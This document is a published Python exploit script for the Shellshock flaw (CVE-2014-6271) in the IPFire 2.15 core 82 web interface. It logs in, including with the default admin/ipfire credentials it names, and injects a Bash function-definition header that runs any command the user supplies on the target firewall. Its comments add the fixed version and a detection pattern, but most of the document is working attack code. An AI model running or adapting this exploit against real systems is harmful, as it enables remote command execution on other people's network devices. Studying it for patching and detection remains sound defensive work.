IPFire - CGI Web Interface (Authenticated) Bash Environment Variable Code Injection



Platform:

CGI

Date:

2014-10-01


#!/usr/bin/env python
#
# Exploit Title : IPFire <= 2.15 core 82 Authenticated cgi Remote Command Injection (ShellShock)
#
# Exploit Author : Claudio Viviani
#
# Vendor Homepage : http://www.ipfire.org
#
# Software Link: http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso
#
# Date : 2014-09-29
#
# Fixed version: IPFire 2.15 core 83 (2014-09-28)
#
# Info: IPFire is a free Linux distribution which acts as a router and firewall in the first instance.
#       It can be maintained via a web interface.
#       The distribution furthermore offers selected server-daemons and can easily be expanded to a SOHO-server.
#       IPFire is based on Linux From Scratch and is, like the Endian Firewall, originally a fork from IPCop.
#
# Vulnerability: IPFire <= 2.15 core 82 Cgi Web Interface suffers from Authenticated Bash Environment Variable Code Injection
#                (CVE-2014-6271)
#
# Suggestion:
#
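# If you can't update the distro and you installed IPFire from an image file (ARM, Flash),
# make sure to change the default credentials of the web interface (user:admin pass:ipfire).
# The injection needs a valid login, so this only narrows who can reach the bug;
# updating to the fixed version listed above is what removes it.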
#
#
# http connection
import urllib2
# Basic Auth management Base64
import base64
# Args management
import optparse
# Error management
import sys

# Start-up banner: ASCII art plus the author's contact details. It is printed
# on every run and carries no data used by the request logic.
banner = """
       ___ _______ _______ __                _______       __
      |   |   _   |   _   |__.----.-----.   |   _   .-----|__|
      |.  |.  1   |.  1___|  |   _|  -__|   |.  1___|  _  |  |
      |.  |.  ____|.  __) |__|__| |_____|   |.  |___|___  |__|
      |:  |:  |   |:  |                     |:  1   |_____|
      |::.|::.|   |::.|                     |::.. . |
      `---`---'   `---'                     `-------'
   _______ __          __ __ _______ __               __
  |   _   |  |--.-----|  |  |   _   |  |--.-----.----|  |--.
  |   1___|     |  -__|  |  |   1___|     |  _  |  __|    <
  |____   |__|__|_____|__|__|____   |__|__|_____|____|__|__|
  |:  1   |                 |:  1   |
  |::.. . |                 |::.. . |
  `-------'                 `-------'

                                IPFire <= 2.15 c0re 82 Authenticated
                                Cgi Sh3llSh0ck r3m0t3 C0mm4nd Inj3ct10n

                          Written by:

                        Claudio Viviani

                     http://www.homelab.it

                        info@homelab.it
                    homelabit@protonmail.ch

               https://www.facebook.com/homelabit
                  https://twitter.com/homelabit
               https://plus.google.com/+HomelabIt1/
     https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""

# Check url
def checkurl(url):
    """Return *url* unchanged when it starts with http:// or https://.

    Any other prefix prints an error message and exits the process with
    status 1. Only the scheme prefix is inspected; host, port and path are
    not validated here.
    """
    has_scheme = url.startswith(("http://", "https://"))
    if has_scheme:
        return url
    print('[X] You must insert http:// or https:// procotol')
    sys.exit(1)

# Two-step check against `url`; every outcome is printed and nothing is returned.
#
#   1. One request is sent without credentials. A successful response means the
#      page is not behind HTTP Basic auth and the run stops there; a 404 or any
#      status other than 401 is reported and the run stops as well.
#   2. On a 401 the request is repeated with an Authorization header built from
#      `user`/`pwd` and an extra header named VULN whose value starts with a
#      Bash function definition, followed by an echo of a fixed marker string
#      and by `cmd`.
#
# Detection: the second request is recognisable by a header value beginning
# with "() {", the pattern associated with CVE-2014-6271. Proxy, WAF or IDS
# rules matching that prefix in any request header cover this request.
#
# Reading the result: "Not Vulnerable" only means the marker did not come back
# in this one response body. The header comment of this file gives core 83 as
# the fixed version, so the installed core version is the reliable check.
def connectionScan(url,user,pwd,cmd):
    print '[+] Connection in progress...'
    try:
        # Unauthenticated probe: only the status matters, the body is not read.
        response = urllib2.Request(url)
        content = urllib2.urlopen(response)
        # No exception means no 401, i.e. no Basic auth prompt on this URL.
        print '[X] IPFire Basic Authentication not found'
    except urllib2.HTTPError, e:
        if e.code == 404:
            print '[X] Page not found'
        elif e.code == 401:
            try:
                print '[+] Authentication in progress...'
                # The newline is stripped from the encoded credentials so the
                # value fits on a single header line.
                base64string = base64.encodestring('%s:%s' % (user, pwd)).replace('\n', '')
                # Header value = function-definition prefix + marker echo + cmd.
                # `cmd` is concatenated as given, without quoting or escaping.
                headers = {'VULN' : '() { :;}; echo "H0m3l4b1t"; /bin/bash -c "'+cmd+'"' }
                response = urllib2.Request(url, None, headers)
                response.add_header("Authorization", "Basic %s" % base64string)
                content = urllib2.urlopen(response).read()
                # A body containing "ipfire" is taken as proof that the login
                # worked and the page belongs to the IPFire web interface.
                if "ipfire" in content:
                    print '[+] Username & Password: OK'
                    print '[+] Checking for vulnerability...'
                    # The marker in the body is the only success indicator;
                    # the output of `cmd` itself is never inspected.
                    if 'H0m3l4b1t' in  content:
                        print '[!] Command "'+cmd+'": INJECTED!'
                    else:
                        print '[X] Not Vulnerable :('
                else:
                     print '[X] No IPFire page found'
            except urllib2.HTTPError, e:
                # A second 401 means the supplied credentials were rejected.
                if e.code == 401:
                   print '[X] Wrong username or password'
                else:
                   print '[X] HTTP Error: '+str(e.code)
            except urllib2.URLError:
                print '[X] Connection Error'
        else:
            print '[X] HTTP Error: '+str(e.code)
    except urllib2.URLError:
        # Raised when the first request cannot reach the server at all.
        print '[X] Connection Error'

# Command-line interface. Each option stores a plain string; the check that all
# four were supplied happens after parsing.
# NOTE: -p/--pwd places the password on the command line, where it is visible
# in the process list and in shell history.
commandList = optparse.OptionParser('usage: %prog -t https://target:444/ -u admin -p pwd -c "touch /tmp/test.txt"')
for short_flag, long_flag, help_text in (
    ('-t', '--target', "Insert TARGET URL"),
    ('-c', '--cmd', "Insert command name"),
    ('-u', '--user', "Insert username"),
    ('-p', '--pwd', "Insert password"),
):
    commandList.add_option(short_flag, long_flag, action="store", help=help_text)
options, remainder = commandList.parse_args()

# The banner is shown on every run, before either the usage help or the request.
print(banner)

# All four options are mandatory; a missing or empty value prints the usage
# text and exits with status 1.
if not all((options.target, options.cmd, options.user, options.pwd)):
    commandList.print_help()
    sys.exit(1)

# checkurl() exits the process itself when the scheme prefix is missing.
url = checkurl(options.target)
cmd, user, pwd = options.cmd, options.user, options.pwd

connectionScan(url, user, pwd, cmd)